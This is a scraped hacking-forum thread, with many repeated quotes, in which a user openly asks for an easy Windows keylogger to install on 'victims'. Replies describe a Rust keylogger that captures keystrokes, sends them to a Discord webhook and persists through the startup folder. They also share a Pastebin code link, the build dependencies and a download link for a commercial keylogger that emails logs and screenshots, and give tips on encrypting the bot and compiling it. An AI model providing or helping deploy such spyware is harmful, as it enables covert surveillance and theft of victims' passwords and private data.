anyone know where i can get an easy to use keylogger?
just need something simple.
just need something simple.
anyone know where i can get an easy to use keylogger?
just need something simple.
Look here(in rust, program will set up a keyboard hook to capture key presses and log them to a file called keylogs.txt in the temporary directory. When the number of words in the log file reaches MAX_WORDS,(500 words) it will send the contents of the file to the Discord webhook and truncate the file to clear it. It will also add itself to the startup folder so that it runs automatically when computer start.anyone know where i can get an easy to use keylogger?
just need something simple.
windows something to put on my victimsIt depends on what you need, meanwhile Windows, Android or Linux
thank you, how is this saved? .bat? i just need to add webhook?Look here(in rust, program will set up a keyboard hook to capture key presses and log them to a file called keylogs.txt in the temporary directory. When the number of words in the log file reaches MAX_WORDS,(500 words) it will send the contents of the file to the Discord webhook and truncate the file to clear it. It will also add itself to the startup folder so that it runs automatically when computer start.
Code:
![]()
use std::error::Error;use std::fs::OpenOptions;use std::io::Write;use std: - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.pastebin.com
Should be good for you
Edit:
Cargo.toml
[dependencies]
hook = "0.5"
reqwest = "0.11"
The program is made in Rust language, final output should be in .exethank you, how is this saved? .bat? i just need to add webhook?
If you don't need complicated things, something like Orion keylogger might be fine too, send screenshots and logs directly to your email, very nicewindows something to put on my victims
exactly what i need, where may i find brother?If you don't need complicated things, something like Orion keylogger might be fine too, send screenshots and logs directly to your email, very nice
exactly what i need, where may i find brother?
trHere pass![]()
Gofile - Cloud Storage Made Simple
Secure, fast and free cloud storage solution. Upload and share files instantly.gofile.io
r
Remember that to receive the logs you must activate access from external sources to your mail, obviously you must encrypt the bot
is there an official download link anywhere? hahaHere pass![]()
Gofile - Cloud Storage Made Simple
Secure, fast and free cloud storage solution. Upload and share files instantly.gofile.io
r
Remember that to receive the logs you must activate access from external sources to your mail, obviously you must encrypt the bot
so just save in notepad with my webhook and save as .exe?The program is made in Rust language, final output should be in .exe
You need to replace webhook with yours (discord webhook)
Complie it Firstso just save in notepad with my webhook and save as .exe?
sorry , and thanks